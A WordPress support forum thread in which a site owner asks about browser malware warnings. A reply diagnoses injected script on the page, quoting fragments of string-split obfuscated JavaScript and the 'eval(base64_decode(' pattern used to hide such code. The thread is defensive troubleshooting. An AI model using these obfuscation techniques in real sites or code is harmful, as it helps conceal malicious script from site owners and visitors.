WordPress.org

Ready to get started?Download WordPress

Forums

Malware on wp site (2 posts)

  1. tansain
    Member
    Posted 1 year ago #

    Hi i have a wp site http://www.income4independence.com but google chrome gives sometime malware error and blocks the site specially visiting the page http://www.income4independence.com/vsl1 and http://www.income4independence.com/vsl1-97 i have added the site in google webmasters tool and it is not giving any malware error, i have done scan on Sucuri http://sitecheck.sucuri.net/results/www.income4independence.com and it is also giving clean sign but on unmask parasite http://www.UnmaskParasites.com/security-report/?page=www.income4independence.com/vsl1/ it gives some time specious hidden links and scrips:

    External References

    - http://www.1shoppingcart.com safe? - displaying 1 of 1
    hidden link - http://www.1shoppingcart.com/SecureCart/SecureCart.aspx?mid=697E24FC-7389-47A5-A803-82DE4FFE645F&pid=26f70dbd299a42669e2014efcdf7d3ed&bn=1
    - ajax.googleapis.com safe? - displaying 1 of 1
    <Script> link - http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js?ver=1.3.2
    - s.gravatar.com safe? - displaying 1 of 1
    <Script> link - http://s.gravatar.com/js/gprofiles.js?ver=2012Augaa
    - s0.wp.com safe? - displaying 1 of 1
    <Script> link - http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201235
    - stats.wordpress.com safe? - displaying 1 of 1
    <Script> link - http://stats.wordpress.com/e-201235.js
    - static.ak.fbcdn.net safe? - displaying 1 of 1
    <Script> link - http://static.ak.fbcdn.net/connect.php/js/FB.Share
    Suspicious Inline Scripts

    Obfuscated script
    var playerhost = (("https:" == document.location.protocol) ? "https://regn.s3.amazonaws.com/ezs3js/...
    Long suspicious script
    if(typeof jQuery=='undefined'){var head=document.getElementsByTagName('head')[0];var scr

    i don't know how to fix this? im using optimize theme and have not found any suspecious obfuscated script in theme files. if i go for new installation, how can i use the same theme?

  2. redleg-too
    Member
    Posted 1 year ago #

    ?? Unfortunately the page is hacked. There is a block of (somewhat) obfuscated script being inserted into the page. When I check the code being returned by a request for the page right after this line of code (which is a legitimate line)

    <img src="http:// ad . retargeter . com /seg?add=394782&t=2" width="1" height="1" />

    there is some script being inserted, the script starts with

    <script type='text/javascript'>var fsiwuk= "Eri"
    +""+"da"+""+
    "hat"+"e" +""+ "s" ;var xzz1bpx3o

    I say somewhat obfuscated because most of the lines are like this

    (""+"src" ,""+"h"+""+""+ "t" +""+"tp"+""+":/"+""+""+ "/w" +

    They have broken up http:// by adding it togeter with +

    From where it appears in the page it looks like possibly it is in your footer?? I suggest you start by checking there. It is alos possiblr the hackers would use some obfuscated php code to write the script, use something like

    eval(base64_decode(' then a long string os seemingly random characters.

    You can see the entire block of script as it is appearing in the page here

    http://pastebin.com/3dEaGbLn

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags